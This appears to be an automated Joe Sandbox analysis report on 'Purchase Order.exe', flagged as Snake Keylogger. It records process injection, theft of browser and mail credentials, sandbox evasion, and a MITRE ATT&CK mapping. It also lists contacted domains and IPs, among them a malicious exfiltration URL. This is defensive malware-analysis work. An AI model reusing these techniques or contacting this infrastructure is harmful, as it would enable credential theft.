Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598729	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598293	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595135	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Thread delayed: delay time: 594469	Jump to behavior

Source: Purchase Order.exe, 00000004.00000002.4419161581.00000000012A5000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Purchase Order.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Purchase Order.exe

Memory written: C:\Users\user\Desktop\Purchase Order.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe	Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"			Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Users\user\Desktop\Purchase Order.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Users\user\Desktop\Purchase Order.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4420689970.0000000003262000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4420689970.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Purchase Order.exe PID: 5304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Purchase Order.exe PID: 3304, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Purchase Order.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Purchase Order.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Purchase Order.exe PID: 5304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Purchase Order.exe PID: 3304, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0.2.Purchase Order.exe.39cb798.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.39aaf78.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.39cb798.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order.exe.39aaf78.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4420689970.0000000003262000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4420689970.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Purchase Order.exe PID: 5304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Purchase Order.exe PID: 3304, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Purchase Order.exe	21%	ReversingLabs	Win32.Trojan.Generic
Purchase Order.exe	29%	Virustotal		Browse
Purchase Order.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
reallyfreegeoip.org	1%	Virustotal	Browse
scratchdreams.tk	6%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://scratchdreams.tk	100%	Avira URL Cloud	malware
https://scratchdreams.tk/_send_.php?TS	100%	Avira URL Cloud	malware
http://scratchdreams.tk	100%	Avira URL Cloud	malware
https://reallyfreegeoip.org/xml/102.129.152.231$	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/102.129.152.231	0%	Avira URL Cloud	safe
https://scratchdreams.tk/_send_.php?TS	1%	Virustotal		Browse
http://scratchdreams.tk	6%	Virustotal		Browse
https://scratchdreams.tk	15%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
us2.smtp.mailhostbox.com	208.91.198.143	true	false		high
reallyfreegeoip.org	104.21.67.152	true	false	1%, Virustotal, Browse	unknown
scratchdreams.tk	172.67.169.18	true	false	6%, Virustotal, Browse	unknown
checkip.dyndns.com	132.226.247.73	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe URL Reputation: safe	unknown
https://scratchdreams.tk/_send_.php?TS	false	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/102.129.152.231	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://us2.smtp.mailhostbox.com	Purchase Order.exe, 00000004.00000002.4420689970.0000000003262000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	Purchase Order.exe, 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://scratchdreams.tk	Purchase Order.exe, 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003157000.00000004.00000800.00020000.00000000.sdmp	false	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://reallyfreegeoip.org	Purchase Order.exe, 00000004.00000002.4420689970.0000000003149000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030E4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003069000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000310D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000313A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	Purchase Order.exe, 00000004.00000002.4420689970.0000000003149000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003094000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030E4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000310D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000313A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	Purchase Order.exe, 00000004.00000002.4420689970.0000000003045000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003149000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003094000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030E4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000310D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000311B000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000313A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	Purchase Order.exe, 00000004.00000002.4420689970.0000000003149000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030E4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000310D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000313A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Purchase Order.exe, 00000004.00000002.4420689970.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/102.129.152.231$	Purchase Order.exe, 00000004.00000002.4420689970.0000000003149000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003094000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030E4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000310D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.000000000313A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://scratchdreams.tk	Purchase Order.exe, 00000004.00000002.4420689970.0000000003157000.00000004.00000800.00020000.00000000.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/	Purchase Order.exe, 00000000.00000002.2016558471.00000000038DE000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4418790694.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.4420689970.0000000003051000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.91.198.143	us2.smtp.mailhostbox.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	false
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
172.67.169.18	scratchdreams.tk	United States	13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1420020
Start date and time:	2024-04-04 10:27:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Purchase Order.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/1@4/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 97% Number of executed functions: 122 Number of non-executed functions: 27
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Purchase Order.exe, PID 3304 because it is empty
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:27:48	API Interceptor	11398930x Sleep call for process: Purchase Order.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.91.198.143	RFQ DM03058 pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Maersk Bill of Lading.exe	Get hash	malicious	AgentTesla	Browse
	DHL9407155789.exe	Get hash	malicious	AgentTesla	Browse
	FedEx_2341717012.exe	Get hash	malicious	AgentTesla	Browse
	DHL9407155789.exe	Get hash	malicious	AgentTesla	Browse
	FedEx_AWB#53023024643.exe	Get hash	malicious	AgentTesla	Browse
	OUU.exe	Get hash	malicious	AgentTesla	Browse
	QT 0905752_AC_SY780093887623645-pdf.exe	Get hash	malicious	AgentTesla	Browse
	FVN001-230824.exe	Get hash	malicious	AgentTesla	Browse
	PO.exe	Get hash	malicious	AgentTesla	Browse
104.21.67.152	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	23343100IM00270839_Dekont1.exe	Get hash	malicious	Snake Keylogger	Browse
	Payment_Draft_confirmation.xla.xlsx	Get hash	malicious	Snake Keylogger	Browse
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse
	proforma_Invoice_0009300_74885959969_9876.exe	Get hash	malicious	Snake Keylogger	Browse
	ATM Dekont E-Maili pdf.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	Q88 09284823910.scr.exe	Get hash	malicious	Snake Keylogger	Browse
	SecuriteInfo.com.Trojan.PackedNET.2725.8730.30889.exe	Get hash	malicious	Snake Keylogger	Browse
	vessel details.exe	Get hash	malicious	Snake Keylogger	Browse
172.67.169.18	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	z52OURO08765.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	SDTP098766700000.exe	Get hash	malicious	Snake Keylogger	Browse
	SecuriteInfo.com.Trojan.PackedNET.2725.8730.30889.exe	Get hash	malicious	Snake Keylogger	Browse
	vessel details.exe	Get hash	malicious	Snake Keylogger	Browse
	Ship Particulars.exe	Get hash	malicious	Snake Keylogger	Browse
	SecuriteInfo.com.Trojan.PackedNET.2725.26841.22155.exe	Get hash	malicious	Snake Keylogger	Browse
132.226.247.73	8wvP84hzFu.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Payment_Draft_confirmation.xla.xlsx	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	xdd6BRIg0O.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	checkip.dyndns.org/
	Mquqdysqqv.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Trojan.PackedNET.2725.19533.14530.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Vessel Particulars.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	MT Ramona Particulars.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Win32.TrojanX-gen.9014.19757.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Win32.TrojanX-gen.12091.2695.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	REQUEST FOR QUOTATION.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
us2.smtp.mailhostbox.com	Dhl 984857.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
